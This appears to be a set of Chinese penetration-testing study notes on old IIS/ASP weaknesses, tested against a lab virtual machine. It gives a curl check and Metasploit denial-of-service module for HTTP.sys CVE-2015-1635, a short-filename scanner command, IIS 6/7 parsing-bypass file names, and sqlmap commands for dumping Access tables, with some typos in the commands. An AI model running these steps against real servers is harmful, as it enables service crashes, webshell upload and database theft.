MDB数据库泄露下载
-
简介
- 首先,MDB数据库不是MongoDB数据库,MDB数据库是access数据库的一种文件格式,而由于大部分ASP程序与ACCESS数据库搭建,但ACCESS无需连接,都在脚本文件中定 义配置好数据库路径即用,不需要额外配置安装数据库,所以大部分提前固定好的数据库 路径如默认未修改,当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击。
-
漏洞复现
虚拟机:2003企业版32位IIS6.0
可以看到服务端的数据库为#data.mdb
访问器路径http://192.168.88.141:81/database/%23data.md,有数据库下载
HTTP.SYS远程代码执行漏洞(CVE-2015-1635)
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分 析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户 的上下文中执行任意代码。
Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2
安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、 Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本
判断漏洞是否存在,在kaili输入
curl -v 192.168.88.141 -H “192.168.88.141:81” -H “Range: bytes=0-18446744073709551615”
有发现返回”range is not satisfiable”就说明有漏洞了。
在kaili中输入以下代码即可
msfconsole
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts xx.xx.xx.xx(ip)
set rport xx
run
IIS短文件之目录扫描
1、概念
在DOS和早期的Windows系统中,文件名的长度被限制为8个字符加上一个点加上3个字符的扩展名,这种格式被称为8.3格式。在Windows下查看对应的短文件名,可以使用命令dir /x
例如
C:\Users\Administrator>dir /x
2024/07/11 14:49 <DIR> DOCUME~1 Documents
2024/07/22 12:17 <DIR> DOWNLO~1 Downloads
2024/06/16 03:50 <DIR> FAVORI~1 Favorites
2024/07/18 13:15 <DIR> IDEAPR~1 IdeaProjects
它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
3、应用场景:
后台路径获取,数据库文件获取,其他敏感文件获取等
4、漏洞利用:
https://github.com/lijiejie/IIS_shortname_Scanner
输入命令:python iis_shortname_scan.py http://192.168.88.141:81/即可
IIS文件解析漏洞
-
IIS 6 解析漏洞
-
该版本会将*.asp;.jpg的格式当成asp解析
- logo.asp;.jpg
-
该版本会将*.asp/目录下的所有文件当成asp解析
- xx.asp/logo.jpg
-
-
IIS 7 解析漏洞
- 该版本会将/xx.jpg/xx.php解析成php文件
IIS写权限漏洞
access注入
-
简介
- access数据库无管理员账号密码,顶级架构为表名,列名(字段),数据,所以在注入猜解中一般采用字典猜解表和列再获取数据。猜解过程简单,但又可能出现猜解不全的情况。由于Access数据库在当前安全发展中已很少存在,故直接使用SQLMap进行注入测试
-
使用命令:
- python sqlmap.py -u “域名” --tables //获取表名
- python sqlmap.py -u “域名” -cloumns -T admin//获取admin表名下的列名
- python sqlmap.py -u “域名” -dump -C “” -T admin//获取表名下的列名数据